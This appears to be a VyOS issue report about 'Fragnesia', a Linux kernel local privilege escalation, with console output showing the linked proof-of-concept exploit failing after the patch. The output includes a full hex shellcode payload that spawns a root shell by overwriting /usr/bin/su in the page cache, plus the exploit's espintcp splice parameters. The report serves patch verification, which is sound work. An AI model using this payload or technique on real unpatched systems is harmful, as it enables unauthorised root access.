Fragnesia (https://github.com/v12-security/pocs/tree/main/fragnesia) is a new local privilege escalation (LPE) vulnerability related to "Dirty Frag" but not identical to it; it needs a separate fix.
Linux 6.6.138, which is now in our images, is vulnerable and needs patching.
After the patch:
vyos@vyos:~$ /tmp/exp
[*] uid=1002 euid=1002 gid=100 egid=100
[*] mode=xfrm_espintcp_pagecache_replace collateral=after
[*] target=/usr/bin/su size=72000
outer_write_open_denied=1 errno=13 (Permission denied)
userns_setup: outer_uid=1002 outer_gid=100 ns_uid=0 ns_gid=0 netns_setup=1 loopback_up=1 xfrm_espintcp_state_add=1 namespace_setup_complete=1
userns_root_mapped_to_outer_user_write_open_denied=1 errno=13 (Permission denied)
[*] timing: rx_pre_ulp=30000us tx_pre_splice=1000us rx_post_ulp=30000us
[*] range: offset=0x0 len=192 last=0xbf enc_len=4080 splice_len=4096
[*] union: transformed=0x0-0x10ae collateral_after=0xc0-0x10ae
[*] payload=7f454c4602010100000000000000000002003e0001000000780040000000000040000000000000000000000000000000000000004000380001000000000000000100000005000000000000000000000000004000000000000000400000000000b800000000000000b800000000000000001000000000000031ff31f631c0b06a0f05b0690f05b0740f056a00488d0512000000504889e2488d3d1200000031f66a3b580f055445524d3d787465726d002f62696e2f7368000000000000000000
stream0_table_entries=256
[*] smashing 192 bytes into read-only page cache
changed=0 skipped=16 remaining=176
0000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
0010 [03]00 3e 00 01 00 00 00 78 00 40 00 00 00 00 00
0020 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0030 00 00 00 00 40 00 38 00 01 00 00 00 00 00 00 00
0040 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00
0050 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00
0060 b8 00 00 00 00 00 00 00 b8 00 00 00 00 00 00 00
0070 00 10 00 00 00 00 00 00 31 ff 31 f6 31 c0 b0 6a
0080 0f 05 b0 69 0f 05 b0 74 0f 05 6a 00 48 8d 05 12
0090 00 00 00 50 48 89 e2 48 8d 3d 12 00 00 00 31 f6
00a0 6a 3b 58 0f 05 54 45 52 4d 3d 78 74 65 72 6d 00
00b0 2f 62 69 6e 2f 73 68 00 00 00 00 00 00 00 00 00
[====----------------------------------------------] 16/192 (8%)
────────────────────────────────────────────────────────────
[-] [1/192] +0000 already=7f skip
[-] [2/192] +0001 already=45 skip
[-] [3/192] +0002 already=4c skip
[-] [4/192] +0003 already=46 skip
[-] [5/192] +0004 already=02 skip
[-] [6/192] +0005 already=01 skip
[-] [7/192] +0006 already=01 skip
[-] [8/192] +0007 already=00 skip
[-] [9/192] +0008 already=00 skip
[-] [10/192] +0009 already=00 skip
[-] [11/192] +000a already=00 skip
[-] [12/192] +000b already=00 skip
[-] [13/192] +000c already=00 skip
[-] [14/192] +000d already=00 skip
[-] [15/192] +000e already=00 skip
[-] [16/192] +000f already=00 skip
byte_flip_nonce=27 stream_byte=01 byte_flip_packet_iv=cccccccc0000001b
[*] [17/192] +0010 03 -> 02 xor=01 seq=2 nonce=27
firing espintcp splice...
sender_ns_uid=0 euid=0 prefix_send=18 splice_to_tcp=4096 file_off=16 file_off_next=4112
receiver_ns_uid=0 euid=0 espintcp_enabled_after_queue=1
sender_status=0 receiver_status=0
[-] fixed behavior: byte unchanged at index=16 offset=16
: Authentication failure
vyos@vyos:~$ id
uid=1002(vyos) gid=100(users) groups=100(users),4(adm),6(disk),27(sudo),30(dip),102(vyattacfg),109(_kea),116(frrvty),117(frr),995(vpp)